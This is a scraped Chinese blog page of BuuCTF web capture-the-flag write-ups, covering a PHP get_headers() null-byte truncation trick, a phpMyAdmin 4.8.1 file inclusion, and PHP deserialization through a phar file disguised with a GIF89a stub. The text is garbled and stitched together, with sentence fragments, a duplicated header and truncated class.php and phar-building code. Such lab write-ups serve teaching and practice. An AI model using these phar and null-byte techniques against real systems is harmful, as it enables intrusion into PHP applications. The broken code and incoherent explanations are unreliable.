BuuCTF Web Writeup 第三部分
2021-01-14 16:11
标签:manifest txt meta rom pap option 如何 compress let 题目提示 题目原型 #79329 get_headers() silently truncates after a null byte This was tested on PHP 7.3, but the function has always had this bug. The test script shows that this can cause well-written scripts to get headers for an unexpected domain. Those headers could leak sensitive information or unexpectedly contain attacker-controlled data. 解题方法 收集信息 善用php bug搜索漏洞 解题方法 扫描后发现存在 phpmyadmin 4.8.1存在文件包含漏洞,构造 上传测试后发现只能上传图片类型文件 抓包 放包之后会显示文件内容 目录穿越 显示结果 题目中的主要文件 class.php(简化) Q: 如何利用RCE vulnerability? 代码中并不 It can be interpreted as a flag and the format is A phar file is essentially a compressed file, in which the permissions, attributes and other information of each compressed file are included. This section also stores user-defined meta-data in serialized form, which is the core of the above attacks. It is the contents of compressed file. phar file format only Construct a phar file according to the file structure, and PHP has a built-in class to handle related operations Set the BuuCTF Web Writeup 第三部分 标签:manifest txt meta rom pap option 如何 compress let 原文地址:https://www.cnblogs.com/0d4y/p/13414897.html[GKCTF2020]cve版签到
Hint: Flag in localhost
Tips: Host must be end with ‘123‘
You just view *.ctfhub.com
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,访问后得知版本信息 4.8.1
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POST /download.php HTTP/1.1
Cookie: PHPSESSID=94b78b93ffa19e6bc6d07e0da5307548
Connection: keep-alive
Upgrade-Insecure-Requests: 1
├── class.php
├── delete.php
├── download.php
├── index.php
├── login.php
└── register.php
class FileList {
private $files;
private $results;
private $funcs;
public function __call($func, $args) {
array_push($this->funcs, $func);
foreach ($this->files as $file) {
$this->results[$file->name()][$func] = $file->$func();
public function __destruct() {
echo $table;
class File {
public $filename;
public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
public function close() {
return file_get_contents($this->filename);
方法存在RCE vulnerability
,但存在文件上传点Attack PHP Deserialization Vulnerability via Phar
the Phar File Structure
0x00 A Stub
.The front content is not limited, but it must end with __HALT_COMPILER();?>
, otherwise the phar extension will not recognize this file as a phar file.0x01 A Manitest Describing the Contents
0x02 The File Contents
0x03 A signature for verifying Phar integrity
option in php.ini
to Off
, otherwise the phar file cannot be generated.class Demo {
$phar = new Phar("phar.phar"); // suffix must be phar
$phar->setStub("GIF89a"); // set stub and disguise as gif
$o = new file();
$o->output = "phpinfo();";
$phar->setMetadata($o); // store custom meta-data in manifest
$phar->addFromString("test.txt", "test"); // compressed file
$phar->stopBuffering(); // automatic computation of signature
上一篇:php 字符串分割函数 str_split,chunk_split
下一篇:centos 7 Docker容器启动报WARNING: IPv4 forwarding is disabled. Networking will not work